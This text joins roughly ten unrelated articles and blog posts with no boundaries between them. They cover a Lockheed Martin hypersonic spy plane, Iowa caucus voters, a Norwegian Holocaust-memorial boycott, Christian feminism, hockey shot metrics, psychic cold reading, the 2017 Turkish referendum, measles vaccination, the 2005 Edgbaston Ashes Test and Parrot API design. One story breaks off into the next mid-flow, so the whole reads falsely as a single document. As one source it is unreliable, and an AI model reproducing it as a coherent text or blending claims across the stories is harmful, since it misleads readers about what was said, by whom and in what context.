C4ISR
Lockheed Martin renews push for hypersonic spy plane
Renewing a push to follow up on military research and testing efforts aimed at fielding hypersonic weapons and aircraft , Lockheed Martin maintains it could produce a hypersonic demonstrator the size of an F-22 fighter for less than $ 1 billion .
Lockheed Martin CEO Marilyn Hewson , speaking at an annual media day event this week , said the price tag for the SR-72 includes development , manufacture and flight-testing of a hypersonic plane . Hewson added that the company has already produced a `` controllable , low-drag , aerodynamic configuration '' under the HTV-3X program capable of `` stable operation '' from sub-sonic through hypersonic speeds up to Mach 6 .
The Hypersonic Test Vehicle , or Blackswift Test Bed , is part of the Falcon program jointly funded the Defense Advanced Research Projects Agency and the U.S. Air Force . Falcon is a component of a larger Pentagon `` prompt global strike '' capability designed to develop hypersonic weapons and a delivery vehicle that would allow it to hit targets anywhere in the world within an hour .
A future hypersonic plane could also replace the retired SR-71 spy plane , flying twice as fast
Another DARPA demonstrator program , the Hypersonic Test Vehicle 2 ( HTV-2 ) , demonstrated stable flight at speeds greater than Mach 20 , though not for a long duration . Along with advanced aerodynamic shapes that are maneuverable , the hypersonic effort also focused on thermal protection along with navigation and guidance improvements .
While these hypersonic test programs have wound down , Hewson said Lockheed Martin is currently supporting two military research efforts called Tactical Boost Glide and the Hypersonic Air-Breathing Weapon Concept ( HAWC ) .
Tactical Boost Glide is a joint DARPA-Air Force effort to develop a hypersonic system at Mach 5 or higher . DARPA said the program seeks to build on development and flight-testing during the HTV-2 program .
The Air Force and DARPA also are jointly sponsoring HAWC research , which aims to demonstrate technologies needed for longer-range , air-launched hypersonic cruise missiles . A key element of the effort is development of a scramjet-powered propulsion system to provide a hypersonic cruise capability .
Lockheed Martin 's Skunk Works unveiled a concept for a SR-72 spy plane several years ago that reportedly uses scramjet propulsion to achieve hypersonic speeds up to Mach 6 , or about 4,600 mph . ( The SR-71 Blackbird was capable of speeds up to Mach 3.5 . )
The research agency said the technology also could be used on future reusable hypersonic aircraft for intelligence , surveillance and reconnaissance missions along with access to space .
`` The technology could also enable hypersonic passenger flights , and even easier access to space , '' Hewson claimed .
The latest Bloomberg Politics/Des Moines Register “ Iowa Poll ” found 56 percent of likely Iowa Republican Caucus-goers were either undecided or might change their minds about which candidate to back on Caucus Night . They 're not hard to find as the candidates trek through Iowa these days .
Jeff Leimer of Sheldahl went to see New Jersey Governor Chris Christie this weekend .
“ I 'm actually quite swayed , ” he told Radio Iowa after the event in an Ames bar . “ I was originally a Trump supporter , to be honest . ”
Christie 's “ town hall ” meeting lasted nearly 90 minutes and , for most of that time , Christie took questions from the crowd . Leimer said the experience made him “ second-guess ” his plan to vote for Trump on Caucus night .
“ I told my family that I would probably vote for Trump , even though I like Christie , but it just comes down who is more electable , so a ‘ Why Waste A Vote ? ' type of thing , ” Leimer said . “ …I was really impressed with a lot of his specific policies . ( Christie ) had specifics . ”
Jeremy Danilson of Johnston got up early Saturday morning to evaluate Marco Rubio in person .
“ I 'm more interested in hearing how they want to address the problems that we face than telling me what the problems are , ” Danilson told Radio Iowa . “ I already experienced what the problems are , so do n't repeat that back to me . ”
That 's why Danilson supported Newt Gingrich in the 2012 Iowa Caucuses , because he considered Gingrich an “ ideas ” candidate . Danilson , who brought his young son to Saturday 's event , said he 's “ been impressed ” with Rubio 's performance in the televised debates .
“ I want to present a contrast in the General Election to whoever the Democrats select , ” Danilson said , “ and I do n't know how you can present a better contrast than someone who 's talking about the future . ”
While Danilson is definitely leaning toward Rubio , Beth Biermann of Windsor Heights is undecided and probably wo n't decide until Caucus Night .
“ Probably , ” she said , laughing . “ It 's like : ‘ O.K. , now what do I do ? ' ”
The televised debates have n't helped much in her decision-making .
“ I do n't have cable , ” Biermann said . “ You ca n't see some of the debates when you do n't have cable . ”
Sharon Scroggs , a neighbor in Windsor Heights , is looking for a candidate “ who seems honest and could possibly get congress to do something . ”
“ I 'm kind of thinking of somebody , but I 'm not going to say who yet , ” Scroggs told Radio Iowa , with a laugh .
Scroggs has delayed a trip to Nevada so she can attend the Caucuses .
Nolan Etter of Des Moines is n't sold on Donald Trump 's style , but he and his wife stood in the cold last Friday to get into a Trump rally .
“ I 've just got to pick somebody , ” he told Radio Iowa . “ I do n't know . ”
New SOS Racisme asked that the 'Zionist Jews of Bergen ' be banned from attending Kristallnacht memorial .
Anti-racism activists in Norway have refused to participate in a Holocaust commemoration because members of the Jewish community were also invited to it , according to a Norwegian blog cited by the International Business Times ( IBT ) .
According to blog “ Norway , Israel and the Jews , ” Norwegian organization New SOS Racisme – which claims to act against racism – demanded that the `` Zionist Jews of Bergen '' be banned from attending the Kristallnacht memorial event held earlier this week .
They `` refused to participate in the Kristallnacht commemoration since a representative from the Mosaic Congregation [ a conservative Jewish Congregation ] was invited . Yes , they balked at a Jew participating , '' the blog commented .
IBT noted that the incident occurred “ a few days after Denmark 's ceremony in Norrebro district , marking the Holocaust , was used to raise money for Gaza , following the 2014 Israel-Gaza war . ”
A local leader of the Jewish community slammed the decision to raise funds for Gaza .
`` When the profits from the Norrebro event go to Gaza , whose government is at war with Israel , I think that there is an inappropriate confusion , '' Dan Rosenberg Asmussen , president of the Jewish Community in Copenhagen , told the Kristelig Dagblad newspaper .
`` I do not know if this is a deliberate attempt to draw a parallel between the actions of Germans then and those of Israelis today – a parallel drawn before by people on the left and one which I strongly reject . If it 's a coincidence , I think it is unfortunate . ''
Sometimes a post needs no introduction ; this is one of them . Thank you so much Leigha , I 'm so grateful .
I am honoured that Sarah has invited me to pen my words on this page today . To commemorate Sarah 's 30th birthday I 'll be sharing thirty things I want the church to know about Christian feminism .
I will be using the word “ we ” as I talk about Christian feminists . I want to be clear that “ we ” are a diverse group of people . Just like not all Christians agree on every doctrinal matter , not all Christian feminists agree on every feminist issue , or every theological tenant . I use the word “ we ” , but I do not speak for all Christians who are feminists , just as I do not speak for all Canadians who blog , or all brunettes who own dogs .
1 . Feminism is the belief in the “ political , economic , and social equality of the sexes. ” * Seriously . That 's it . Do you believe that women should have political , economic , and social equality with men ? Then , congratulations ! You 're a feminist !
2 . Christianity is “ the religion derived from Jesus Christ , based on the bible as sacred scripture. ” * Do you believe that women should have political , economic , and social equality with men AND identify as a follower of Christ ? Well , golly gee ! You just might be a Christian feminist ! ( Do n't worry , we 'll teach you the secret handshake later . )
* Yes , I broke out my Merriam-Webster Dictionary . Yes , I am nerd .
3 . Okay , so I might be oversimplifying things a bit . But that 's the point . We often paint those with whom we disagree , or do n't understand , as evil villains out to destroy our carefully constructed castles of Christendom . We create foils of those who may believe differently than we do , or have slightly different hermeneutical approaches . This is about engaging , about turning on the lights and realizing that those who looked so menacing in the shadows are actually more similar to us than we originally thought .
4 . For the love of all that is holy and good , please stop talking about how feminism was created in the 1960s . Please ! Read a book , or a Wikipedia article . Please ?
5 . Feminism is not out-dated . It is needed . Desperately .
6 . …Because only 16 of the world 's 188 directly elected leaders are women .
7 . …Because even in a developed country , such as the one in which I live , half of all women have experienced physical or sexual violence before they have celebrated there sweet sixteen .
8 . ….Because every 90 seconds a woman dies in pregnancy or childbirth . And 30,000 women lose their jobs in the UK each year due to pregnancy discrimination .
9 . …Because the majority of women earn on average about 75 % of the pay of males for the same work , in both developed and developing countries . And the church is no exception , where men make 28 % more than their female counterparts .
10 . You may hear some us identify ourselves as “ womanist ” . Others of us will wear the label of “ egalitarian ” , or “ women 's lib/rights activist ” .
11 . There are those of us who whole heartily embrace the title of Christian feminist . There are pews overflowing with those who are feminists precisely because they are followers of Christ .
12 . There are others who cringe a little at the Christian Feminist banner . Who view the combination of the two terms as diminishing the depth of our passion and belief . The first word apologizing for the second , the second qualifying the first . ( “ Yes I am a Christian , but I 'm a feminist Christian. ” Or “ Well , I 'm a feminist , but I 'm a Christian feminist. ” ) I am a Christian . Full Stop . I am a Feminist . Full Stop .
13 . Most of us are perfectly okay if you just call us “ Leigha ” or “ Rebecca ” or “ Tim ” . I 've honestly been introduced as “ This is my friend , Sheisafeminist. ” Using my name is always preferred . I promise I am capable of interacting in public without inviting all the women to “ burn their bindings of patriarchy ” .
14 . Some of us have momma arms , tired from all the rocking and holding of our little ones , or momma arms that are aching with emptiness and longing .
15 . Some of us do not . And our decision to have or not have children , does not affect our value in the Kingdom of Heaven .
16 . Some of us are better women , better Christians , by serving in areas outside of parenthood .
17 . You might discover us preaching from pulpits , or shouting our message of good news for all from metaphorical street corners .
18 . You can find us birthing books , or babies , or blogs , or all three .
19 . Or you may stumble upon us , living out our lives , upholding the quiet dignity of equality .
20 . The opposite of a patriarchy is not a matriarchy
21 . We believe in mutual submission .
22 . We can be feminine too , you know . Feminist and feminine are not opposite ends of the same spectrum .
23 . We are not about diluting the gospel . We do n't pick and chose what sections of scripture we wish to apply .
24 . …Or we do . In the same way that everyone does . By which I mean we look at scripture within the linguistic , cultural , historical context that it was written .
25 . There are prolife feminists , and prochoice feminists , and feminists who find the two terms utterly insufficient in addressing the sanctity of life .
26 . If you want to know our view on a controversial issue , ask us . Most of us are still working it out with fear and trembling . We 're wrestling and walking with limps .
27 . Men can be Christian feminists too ! There are Christian feminists who are men , Christian feminists who are women and Christian feminists who do n't fit gender binaries .
28 . We have a shameful history of excluding women of colour , queer women , ( dis ) abled women . And we are sorry . Feminism is n't just for white , cis-women . It should be intersectional and inclusive . It 's for everyone , just as Christ is for everyone .
29 . We will continue to call out injustices we see inside and outside the church . We will full torso wrestle for freedom . Because , in the words of Audre Lorde , “ I am not free while any woman is unfree , even when her shackles are very different from my own . ”
30 . Whether or not you identify as feminist is n't the issue here . The label on your nametag does n't really matter . We are all apart of the body of Christ . We strengthen each other . You need us . And we need you to hear our voice . We need you .
Leigha is a recovering Sunday School Scholar , who is learning to embrace questions without answers . An MSW candidate and lover of words , she believes in the power of narratives , both the personal and the collective . Leigha writes her words and lives her life on the East Coast of Canada . She blogs at leighamayspeak.blogspot.com and is on Twitter @ leighacann
Advertisements
Over the years , analytics in hockey have grown and evolved . Shot metrics and measures that provide context to them have become part of the standard toolbox used by many inside and outside of NHL offices . The principle of puck possession , while known to the hockey world since time immemorial , has taken on a whole new level of importance with shot metrics gaining in popularity .
Shot metrics were initially * explored in an effort to discover a decent proxy for time of possession in hockey . Much like you see in other sports such as football , people wanted to get a better handle on quantifying how often and for how long specific teams had the puck as opposed to playing defense , i.e . time of possession . The thought process here was fairly logical . Because the objective in hockey is to score goals , having the puck is better than not having it .
Shot metrics , such as Shots On Goal , Shot Attempts ( Missed , Blocked , On Goal ) and Unblocked Shot Attempts ( Missed , On Goal ) , were explored as ways to potentially find measures that could reproduce time of possession without necessitating a person with a stop watch timing every possession in every NHL game . As it happened , a strong correlation was found between those metrics , particularly Unblocked Shot Attempts , over the course of the regular season , and success , namely landing a spot in postseason play . That correlation provided confidence in the reasonable reliance on these metrics as tools to measure the strength of teams .
Teams which show well in these metrics are often called “ strong possession ” teams . “ Puck possession ” has become a commonly used term and is the generally accepted phrase for the modern approach to achieving success in hockey . “ Puck possession ” is a bit of a misnomer though in its current usage .
Teams spending long periods of time in the offensive zone , or possessing the puck , is good right ? Not necessarily . It 's certainly better than constantly being hemmed into the defensive zone , of course ; however , simply having the puck in the offensive zone ( passing , running the cycle , i.e . what many terms as “ puck possession ” ) is not what has been established as having a high correlation to success . Shot generation ( creating shots toward the net ) and shot suppression ( preventing shots toward the net ) are actually the metrics that have been linked to success .
Regardless of how long teams spend in the offensive zone , if they are passing and failing to generate shots , they are not exhibiting the hallmarks of success because they are not generating shots toward the net . If you try to visualize this , these long periods of possession often resemble a power play . The attacking team gains the offensive zone , establishes a cycle and passes the puck numerous times looking for a “ perfect shot ” instead of creating multiple shot attempts during the possession .
The common thinking that may be leading some teams to this is that a shot toward the net creates the opportunity not only for a goal , but for a rebound or miss that could be collected by the defending team and thus necessitate getting back on defense themselves . It may be that some coaches feel long periods of possession , despite a lack of shot generation , are a form of shot suppression or at the very least , in keeping with the principle of puck possession . Technically , this is true ; however , the teams using this form of possession often seem to be lacking in solid defensive systems .
Shot suppression is not achieved simply by keeping the puck out of your defensive zone by holding it in the offensive zone . Every team in existence has to get back on defense . Denying the attacking team 's entry to the offensive zone , aggressive backchecking , sound and well executed breakout plans from the defensive zone and the like are far more effective in achieving shot suppression than trying to keep the puck in the offensive zone for extended periods of time . These strategies are also more effective for shot generation because they are all ways to help the team get back on the offensive attack using a quick transition .
It is intriguing to think that the quest for a good proxy for time of possession has actually led to a finding that success is not really a matter of time of possession , but a matter of shot generation and suppression , which are far more complex than simply being in the right zone of the ice .
Teams like the Colorado Avalanche seem to understand the long held tenet of “ puck possession ” , but have attempted to adhere to that principle using the possession time strategy as opposed to the shot generation/suppression strategy . The Avalanche is not the only example of this in the NHL to be certain . It probably is n't a coincidence that they use systems which , on their surface , seem in keeping with the principle of puck possession , but which , upon closer inspection , display a failure to grasp the true meaning of the principle .
As the decision-makers are afforded a more informed , nuanced approach to the principle of puck possession through the adoption of shot based analytics , it will be interesting to see the changes made to their strategies for adhering to that principle .
* Shot metrics were explored for several reasons initially , not simply for time of possession . Work was done to see what meaning shot metrics and scoring chances had within the game of hockey by bloggers in the Edmonton Oilers fan base after learning that the team tracked scoring chances . Thanks to Garret Hohl for mentioning this to me so I could edit and include this for the sake of accuracy .
Advertisements
In Professor Richard Wiseman 's latest book , Paranormality , he suggests that it is very easy for so-called psychics to give highly accurate readings . Later , in the back of the same book , he gives an example that can be utilized to convince complete strangers that you can read their aura ( or some other similar medium babble ) and demonstrate that your apparent psychic powers are real , because you know all about them .
OK then , lets put that to the test here and now .
First , here is a reading that is just for you ( yes , I just magically read your vibrations as you tapped the keys to bring you here , and have now created this reading that is just for you and nobody else )
You are a loyal and devoted friend – someone people can rely on in times of difficulty . Although you are fair-minded , you are also a far more ambitious person than your friends and colleagues realize . Most of the time you give the impression of being strong , but deep down you sometimes worry about what the future will bring . In certain circumstances you can be something of a perfectionist , and that this sometimes annoys those around you . You are good at seeing both sides of the argument rather than jumping to conclusions . You are the type of person that likes to gather together all of the facts and then make a decision . When you look back on your life , you sometimes dwell on what you might have done differently , but in general you focus on the future . Although you enjoy change and variety , you are also attracted to a sense of routine and stability . You are facing a significant decision right now , or have recently experienced a large change in your life . You know that you have considerable unused capacity that you have not turned to your advantage , and at times you are extroverted and sociable , while at other times you are far more introverted and reserved .
Now , on to the poll … is he right , would this work for most folks and successfully con them ?
[ poll id= ” 5″ ]
I occasionally come across folks who are totally sold on the idea that many psychics are indeed fakes , but some are real and then proceed to tell you of one who gave a reading that was bang on the mark and too close to be just cold reading .
What Professor Wiseman suggests is that anybody , with a bit of practise , can replicate that effect , the above being an example of an accurate psychic reading created just for you by a completely non psychic skeptic .
So how was it for you ?
Share this : Facebook
Twitter
Reddit
Tumblr
Pinterest
LinkedIn
Pocket
Skype
WhatsApp
Email
Print
Like this : Like Loading ...
VIENNA/BERLIN ( Reuters ) - Up to 2.5 million votes could have been manipulated in Sunday 's Turkish referendum that ended in a close “ yes ” vote for greater presidential powers , an Austrian member of the Council of Europe observer mission said on Tuesday .
A man casts his ballot at a polling station during a referendum Aegean port city of Izmir , Turkey , April 16 , 2017 . REUTERS/Osman Orsal
However Turkish authorities are not cooperating with efforts to investigate claims of possible election fraud , according to a senior official in the Organisation for Security and Cooperation in Europe ( OSCE ) , which conducted a separate monitoring mission .
Turkish President Tayyip Erdoğan has dismissed criticisms of the vote , saying foreign observers should “ know their place ” . The foreign ministry said foreign monitors lacked objectivity and impartiality .
The mission of observers from the 47-member Council of Europe , the continent 's leading human rights body , had already pronounced the referendum to be an uneven contest . Support for “ Yes ” dominated campaign coverage , and the arrests of journalists and closure of media outlets silenced other views , according to Council of Europe and OSCE monitors .
Alev Korun , an Austrian member of the Council 's observer team , said there were questions about the actual voting as well .
“ This is about the fact that actually the law only allows official voting envelopes . The highest election authority decided however - as it were , against the law - that envelopes without official stamp should be admitted , ” she told ORF radio .
“ There is a suspicion that up to 2.5 million votes could have been manipulated , ” added Korun , a Greens member of the Austrian parliament . That number of votes would be almost double the margin of Erdoğan 's victory .
Michael Georg Link , who headed the OSCE observer mission , said Turkey was not helping an investigation into possible irregularities , and Ankara 's questioning of OSCE neutrality was “ clearly politically motivated ” .
He declined comment on a possible change in the result of the referendum after any recount , but said the election commission 's decision to allow incorrectly or non-stamped envelopes was a definite violation of Turkish law .
“ Unfortunately we can not talk about any cooperation , ” Link told the RND German newspaper chain . “ Erdoğan 's decision to extend the state of emergency for 90 days and comments in which the election commission has already rejected claims of manipulation send a clear message . ”
Election authorities said preliminary results showed 51.4 percent of voters had backed sweeping new powers for Erdoğan , something he says is needed to prevent instability .
Turkey 's main opposition began a battle on Tuesday to annul the referendum .
Korun said police in the majority Kurdish town of Diyarbakir hindered two of her colleagues from entering voting locations . She also pointed to social media videos that seem to show people voting more than once , although this still had to be proven .
“ These complaints are to be taken very seriously and they are , in any case , of such an extent that they would turn around the outcome of the vote , ” Korun said .
The pro-Kurdish opposition Peoples ' Democratic Party said it presented complaints about unstamped ballots affecting 3 million voters , more than twice the margin of Erdoğan 's victory .
Contained inside the data of the latest measles outbreak is a surprising — and troubling — number . Among the 51 measles cases linked directly to Disneyland , six of the people had received their measles , mumps and rubella vaccine , according to the Centers for Disease Control and Prevention .
It should come as little surprise when the unvaccinated get sick with the measles . As viruses go , this one packs a mighty punch . Nine of out 10 unvaccinated people exposed to the measles virus will get the measles . That 's a whopping 90 percent .
But why had n't the vaccine protected these six people who had been vaccinated ?
Here 's the thing . The MMR vaccine is very effective , but it 's not 100 percent preventative . Some people who get the vaccine are still at risk of contracting the disease . Large numbers of vaccinated people act as a firewall that prevent the disease from spreading to those who are vulnerable . The vaccinated protect the unvaccinated . That 's known as “ herd immunity. ” But as more people opt not to get vaccinated , or not to get their children vaccinated , the virus has more portals to creep through , more people to infect . And those people sneeze and cough , releasing the virus into the air , and that fuels the spread of the disease .
Some parents opt out of the MMR vaccine , often due to thoroughly discredited studies that link it to autism . Simply put , if everyone got the vaccine , the virus would have nowhere to go . The unvaccinated keep the measles alive .
But let 's back up . The MMR vaccine works by introducing tiny live amounts of the three viruses — measles , mumps and rubella — to provoke an immune response in the body that serves as a lifelong protective shield . It comes in two doses . Typically the first is administered at 12 months and the second at 4 or 5 years old . The first dose provides 95 percent protection . But 5 percent of patients have immune systems that do n't respond to these antibodies . The second kindergarten-age dose bolsters the coverage to 99 percent .
“ But you still have 1 percent of people who have two doses of the vaccine who we call non-responders , ” Patsy Stinchfield , director of Infection Prevention and Control and the Children 's Immunization Project at Children 's Hospitals and Clinics of Minnesota .
Think about it this way . Say there was a massive measles outbreak , and 1 million people were infected . Roughly 10,000 of those people who had received both doses would still get sick .
In the case of the Disneyland outbreak , four of the measles patients had received the full two doses ; two had received only one dose .
At especially high risk for the measles are infants between the ages of six and 12 months , who are too young to get the vaccine . Maternal antibodies that cross the placenta protect the child for the first few months of life . But as the baby gets bigger , that protection fades .
“ Between six and 12 months , you do n't get that maternal antibody protection , and you have n't had the vaccine , so you 're in this valley of vulnerable , ” Stinchfield said .
And there 's another group that 's at an extremely high risk of developing life-threatening measles pneumonia : people with already weakened immune systems .
Consider this case .
Laura Bredesen 's son Ben was diagnosed with acute lymphoblastic leukemia in June 2010 . He was 2 . For more than three years , he underwent daily chemotherapy and frequent steroids , treatment that left his immune system compromised and extremely vulnerable to any virus . “ Every minor illness , ” his mother wrote , ” had the potential to balloon into a more complicated condition requiring additional treatments . ”
In March 2011 , Ben was potentially exposed to the measles by an unvaccinated 2-year-old while in the hospital for a routine spinal tap treatment . He had received his first dose of the MMR vaccine , but was too young for the second , and doctors feared his chemotherapy , which kills cancer cells but can also impact immune memory cells , had weakened his protection to the virus . The chemotherapy , in other words , had made Ben vulnerable to diseases he 'd been vaccinated against .
What followed , Bredesen said , were the scariest three weeks of her family 's life . Ben 's muscles were injected with eight painful shots of immune globulin to boost his immune system , after which his legs were so sore he temporarily could n't walk , and he was isolated at home to protect others for nearly three weeks .
“ If Ben had come down with the measles , his chances would n't have been good , ” Bredesen said . “ He would have been fighting for his life . ”
Ben , now 7 , never contracted the measles and is “ doing wonderfully now , ” his mother reports . But she remembers that time as being the most “ mentally painful ” of his treatment .
“ Those 3.5 years were incredibly hard , ” Bredesen said . “ But those 21 days were the most challenging of our lives . ”
Among the viruses that commonly make news — enterovirus 68 , Ebola , influenza and measles — measles ranks far and away the most contagious , Stinchfield said .
“ You wo n't get Ebola in a subway , in a school , at a daycare or in a train station , but you can get the measles in all those places , ” she said . “ It stays airborne for two hours after someone walks through that train station . That means everyone who walks through the airspace will be exposed . ”
And while most patients recover fully , “ it is a disease that needs to be taken very seriously , ” said Dr. Eric Handler , the health officer in Orange County , where 23 of the cases have been reported this year . Of the 23 , six were children , five of them unimmunized , he said .
Measles often starts with cold symptoms : a runny nose and watery eyes that can turn to conjunctivitis , or pink eye . Symptoms typically progress to a cough , fever and a rash . Most people are in bed , miserable , for a week and then recover . In most cases , it 's a manageable illness . But about 1 in 20 people with measles will get pneumonia and likely be hospitalized . And 1 in 1,000 measles cases will advance to encephalitis , a dangerous swelling of the brain .
Of the encephalitis cases , Stinchfield said , a very high percentage — about two-thirds — have permanent impairment , whether that 's brain damage , developmental delays , blindness or deafness . “ They go home a different person , ” she said .
“ What you have to understand is really even one case is considered a public health emergency because of how contagious measles is , ” Stinchfield said . “ It only takes a small community of unimmunized for the virus to take hold and spread . ”
A pictorial code for sportsmanship at its finest , but just what did Andrew Flintoff say to Brett Lee after closest of finishes at Edgbaston ? © Getty Images
The biggest turning point of the greatest cricket series ever played came during a game of rugby . Australia were warming up on the morning of the second Test at Edgbaston , playing touch rugby , when Glenn McGrath trod on a stray cricket ball and badly injured his ankle . As word spread that McGrath would miss the match , the whole of England celebrated like a dictator had been overthrown .
Although the pitch looked good , Australia had planned to bowl first if they won the toss in an attempt to further expose the wounds opened by McGrath at Lord 's . In his absence , Ricky Ponting took the same decision to the surprise of almost everybody at the ground . The video of the toss shows his opposite number Michael Vaughan having to work exceptionally hard to retain his poker face at the moment Ponting says Australia will bowl . `` He 's a lovely guy , that Ricky Ponting , '' said Geoffrey Boycott later . `` He likes the English so much he changed the series with the most stupid decision he 'll ever make in his life . ''
Normally a captain is savaged if he bowls first and a side makes 600 . England made 407 at Edgbaston , a good score but no more , yet the manner in which they did so changed the mood of the series . They scored those runs in just 79.2 overs , at a staggering 5.13 per over , with 10 sixes . It was an outrageously aggressive response to the crushing humiliation of Lord 's .
Marcus Trescothick set the tone with a coruscating 90 , and after lunch Kevin Pietersen and Andrew Flintoff had a game of unspoken one-upmanship during a partnership of 103 . Pietersen made 71 and Flintoff returned to form with 68 from just 62 balls . That included five sixes , one hooked blind off Brett Lee , an unwitting homage to Ian Botham in 1981 . Flintoff said he bottled it at Lord 's ; if he could have bottled the freedom with which he played for the rest of the series , he would have been one of the greatest players of all time .
In the most important game of their lives , England batted with happy abandon . It was their captain Vaughan who imbued the entire side with the same aggressive approach he demonstrated in Australia in 2002-03 . `` He 's the best liar I ever met , '' said Steve Harmison of Vaughan 's ability to make his team believe everything was or was going to be okay .
He did n't need to lie on the second day , as England took a significant first-innings lead of 99 . Giles ' dismissal of Ponting - who moved ominously to 61 , determined to make up for his decision at the toss - was a key moment , one of three important top-order wickets for a player who had been heavily criticised after the first Test .
You know sport is truly special when you feel nervous even when you watch replays , and Edgbaston 2005 retains that quality
Any sense of English comfort soon started to dissipate , however . Warne bowled Andrew Strauss with a staggering delivery on the Friday evening - his Ball of the Twenty-First Century . On the eve of the match , Warne was asked about his famous delivery to Mike Gatting in 1993 . `` I 'd give up sex to bowl a few more of those balls this summer , that 's for sure . '' The delivery to Strauss , and the grainy pictures of Warne in a hotel room with two blondes and an inflatable , suggested there was no need for such a trade-off .
On the third morning at Edgbaston , Warne and Brett Lee reduced a jittery England to 75 for six . Flintoff then continued his exceptional match with 73 from 86 balls , including four more sixes . The third , a bunt down the ground off Lee provided one of Mark Nicholas 's many memorable commentaries during the series on Channel 4 in England . `` Oh , hello ! Massive ! MASSIVE ! '' All the while his co-commentator Boycott could be heard cackling with disbelief and joy . Flintoff added 51 for the last wicket with Simon Jones . Warne , bowling imperiously , ended with six for 46 in the innings and ten in the match . As Flintoff walked off , Warne shouted after him . When Flintoff turned round , Warne mouthed `` well played '' and applauded .
Australia were left needing 282 to win . Matthew Hayden and Justin Langer moved so easily to 47 for none that , even at that early stage , it felt like it was Flintoff or bust . In his first over , he dismissed both Langer and Ponting . It was the moment an ordinary human being became SuperFred . Langer was bowled off his elbow , and then Ponting received the most exhilarating working-over since Michael Holding blew away Geoff Boycott in 1981 .
A no-ball from Flintoff actually helped England , because it gave him an extra delivery - from which Ponting was dismissed . `` They were five of the most vicious deliveries you could ever see , '' said Gilchrist . `` And then Ricky was somehow good enough to get his bat on the last ball to nick it to Geraint Jones . Flintoff stood there like Hercules and his team-mates mobbed him . I remember , in the rooms , watching and thinking , 'We are in big strife . ' ''
The third day was one for the ages : there were 332 runs , 17 wickets , and approximately four million momentum shifts . It ended with Australia surely beaten : they were 175 for eight after Harmison bowled Michael Clarke with an outrageous slower ball in the final over of the day .
`` Jones ! Bowden ! Kasprowicz the man to go '' : the last ball of Edgbaston 2005 as Richie Benaud called it © Getty Images
The fourth day was apparently a simple case of England turning up and taking the last two wickets . There was a slight scare when Warne and Lee added 45 , but when Warne comically kicked his own stumps down against Flintoff , everyone relaxed again . For about twenty minutes . Then it became apparent that , not only were Lee and Kasprowicz adding runs at speed , they were doing so with alarming comfort . It all happened so fast that , before anyone knew it , Australia needed only 15 to win . That was when Simon Jones , diving forward at third man , dropped a sharp chance offered by Kasprowicz .
The target moved into single figures . By now an entire nation had stopped its day of rest . `` Physically sick but still watching , '' texted the England coach Duncan Fletcher 's daughter to her mother . You know sport is truly special when you feel nervous even when you watch replays , and Edgbaston 2005 retains that quality . With four needed , Lee smashed Harmison through the covers ; there was a fleeting yelp of triumph from the Australian fans , before they realised Vaughan had a cover sweeper in place and it would only be one run . Two balls later , Kasprowicz fended a short ball from Harmison down the leg side , where the much-maligned wicketkeeper Geraint Jones took an excellent tumbling catch .
England 's celebrations were joyously uncoordinated , with players running in different directions before they eventually came together . Harmison broke off from the celebrations to console Lee and then Flintoff did the same , his face a picture of compassion , respect and empathy . The result was one of cricket 's iconic photographs , a pictorial code for sportsmanship at its finest .
The cricket world often wonders what Flintoff said , as if he dispensed one of the great pearls of wisdom . The reality was more mundane . `` It came out of my mouth , it 's nothing profound is it ? ! '' said Flintoff . `` It 's not gon na be something life-changing ! '' Lee has a vague recollection . `` It was something like , 'Awesome game , bad luck , I thoroughly enjoyed it . ' ''
Lee cried in the shower area after the game , his batting gloves still on , and then had a beer with Flintoff in the dressing-room . Flintoff sometimes jokes that the sympathetic expression was a smokescreen for an earthy reminder to Lee that England had just made the score 1-1 . The reality was far more generous in spirit , of course . Although the essential point of Flintoff 's joke is correct : Lee may not be an Aussie bastard , but it was 1-1 rather than 2-0 , and the Ashes were ablaze . In no small part thanks to a stray cricket ball .
Rob Smyth 's new book , Gentlemen and Sledgers : A History of the Ashes in 100 Quotations , was published in May 2015
© ESPN Sports Media Ltd .
I use actual , measured needs to help design software . I also use reported failures to help design software . I have one more design principle : I use misunderstandings to help me design software .
In particular , this is an API-level design principle . The question changes from `` How can I make a particular feature possible ? '' to `` How can I make a particular feature impossible to misuse ? ''
Up-front Failure Prevention
It 's easy to demonstrate failures of this principle ; consider string handling in the C programming language , or global-by-default variables in Perl 5 , or the Python REPL 's behavior when you type quit or exit . ( That last example catches me every time I use Python 's interactive mode . Thanks for the lovely warning . Please do what I want if you know what I want . )
This principle also falls somewhere in between necessity-driven design and bug-driven design . It requires asking `` What could possibly go wrong ? `` , enumerating the likely and unlikely possibilities , analyzing their risk , and determining the likelihood of failure .
For example , Parrot supports a data structure known as a constant string . These are immutable singleton structures which represent strings used pervasively throughout the core system . By making them immutable , we obviate the need to make copies to prevent unwanted modifications . By making them singletons , we can collapse multiple references to a single string into pointers to that singleton string and save lots of memory .
We use a macro called CONST_STRING in C code in the Parrot core to identify one of these strings .
While it would be nice if our documentation were always sufficient to describe how to write a Parrot extension without copying and pasting code from the core , I realize that almost everyone who will ever write a Parrot extension will start with skeleton code cribbed from elsewhere .
I wanted to make the constant string technique work reasonably well for extensions as well . It 'll never be quite as fast nor efficient as the core version , but a quick cache does help a lot of benchmarks .
Our first attempt used a different macro , CONST_STRING_GEN , as the internal implementation of that macro had to be different . Rather than poking directly into interpreter memory , extensions have to go through a secondary lookup : they do n't have access to internals in the same way that Parrot 's core does .
Then I realized the problem .
I do n't want to explain the mechanics of how constants string work , at least not to people writing extensions . I want to say nothing more than `` If you know you 'll never need to modify this string , mark it as a constant string . '' I know I do n't want to explain the differences between the caching models , especially because extensions should n't need to know anything about Parrot 's unencapsulated internals .
Yet I knew that people would copy code from the core into their extensions and then wonder why their versions Just Did Not Work .
I changed the extension processor to emit a different version of the CONST_STRING macro local to each extension which uses the appropriate public API to manipulate constant singleton strings . Even though the mechanics of how this works differs between core code and extension code , it still reads the same way . People can copy and paste code between core data structures and extensions without knowing the difference , at least in this respect .
Even though copying and pasting is generally bad , it 's so pervasive ( especially in this context ) , our interfaces have to allow for it -- and should not allow people to make subtle errors .
For further reading , I suggest Joshua Bloch 's How to design a good API and why it matters talk from OOPLSA 2006 .
Reacting to Failure
Of course , it 's not always possible to predict what people will do wrong .
Sometimes the best you can do is look at a bug report , ask yourself `` Wait , why in the world would you ever write code this way ? `` , and then work backwards . How did that failure occur ? Do you not provide the right APIs ? Do your abstractions leak ? Are people working around a broken feature ? Are people working around the lack of a feature ?
Sometimes you need to pave the cowpaths . Sometimes you need to change the way you explain code . Sometimes you need to change the name of an API call or a parameter to suggest the right behavior .
